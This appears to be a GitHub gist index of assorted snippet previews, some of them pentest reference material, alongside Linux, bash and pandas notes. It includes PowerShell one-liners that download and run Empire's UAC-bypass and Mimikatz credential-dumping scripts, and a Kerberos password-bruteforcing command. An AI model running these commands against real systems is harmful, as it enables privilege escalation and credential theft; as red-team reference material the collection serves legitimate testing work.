babywyrm

"Knowledge is powerful, be careful how you use it!"

A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more.

babywyrm

**** PENTEST PRE_CHECK ****

yum update ;;  apt update|upgrade ;;
Is everything patched up?  All definitions, all signatures, hashes, tools?
You're totally in-sync with personnel on the other side?


"Good-To-Go"
Verify these aren't broken please,

babywyrm

# Description: 
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands

babywyrm

Linux terminals, tty, pty and shell
napicella profile image Nicola Apicella twitter logo Feb 19 ・9 min read  
#linux #beginners #go #learning
Linux terminals demystified (2 Part Series)

This is the first of two articles about Linux terminals. By the end of the two articles, we should be able to:

describe the main components in the terminal subsystem
know the difference between TTY, PTY and Shell
answer what happens when we press a key in a Terminal (like Xterm, etc.)

babywyrm

-----------------------------------------------------------------------------------------------------
#!/bin/bash
set -o errexit
set -o pipefail
set -o nounset
set -o xtrace
# set -eox pipefail #safety for script
------------------------------------------------------------------------------------------
shell script
$0 represent the shell script file name itself

babywyrm

# /dev/alias Pentest Environment Setup
# Version: 0.2 (20131211)
# Created By: Glenn 'devalias' Grant (http://devalias.net)
# License: The MIT License (MIT) - Copyright (c) 2013 Glenn 'devalias' Grant (see http://choosealicense.com/licenses/mit/ for full license text)

# TODO:
#   * Option to check if tools (from this script and external) exist/are already installed and what versions
#     * Eg nmap , metasploit, etc
#   * Lair: https://github.com/fishnetsecurity/Lair
#     * apt-get install python-pip

babywyrm

import sys

# Provides introspection into the Python Scripter API.

apis = ('extender', 'callbacks', 'helpers', 'toolFlag', 'messageIsRequest', 'messageInfo')
funcs = (type, dir)

if messageIsRequest:
    for api in apis:
        print('\n{}:\n{}'.format(api, '='*len(api)))

babywyrm

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

babywyrm

###########################################################
## https://www.reddit.com/r/cybersecurity/comments/iu17uu/cybersec_cheat_sheets_in_all_flavors_huge_list/
###########################################################

Posted byu/HeyGuyGuyGuy
12 days ago
Cybersec Cheat Sheets in all Flavors! (Huge List Inside)
"UGH! Whats the command to [insert function here]?"

###########################################################

babywyrm

# List unique values in a DataFrame column
df['Column Name'].unique()

# To extract a specific column (subset the dataframe), you can use [ ] (brackets) or attribute notation.
df.height
df['height']
# are same thing!!! (from http://www.stephaniehicks.com/learnPython/pages/pandas.html 
# -or-
# http://www.datacarpentry.org/python-ecology-lesson/02-index-slice-subset/)